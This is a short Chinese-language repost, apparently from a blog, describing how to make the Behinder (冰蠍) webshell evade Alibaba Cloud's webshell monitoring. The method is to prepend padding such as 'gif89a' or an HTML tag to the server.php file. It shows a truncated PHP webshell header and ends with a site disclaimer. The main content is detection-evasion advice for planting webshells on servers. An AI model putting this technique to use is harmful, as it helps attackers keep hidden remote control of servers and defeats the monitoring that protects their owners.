最近在滲透測試阿里雲服務器的時候,發現冰蠍被阿里雲報webshell事件,和冰蠍的作者rebeyond是多年的老朋友了,交流了一下,在server.php服務端文件里面加入一些混淆字符就可以繞過監控了,大家自由發揮:
如<html lang="en"> 或gif89a等寬字符
gif89a <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])).....
冰蠍繞過阿里雲盾和天眼監控的新方法
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。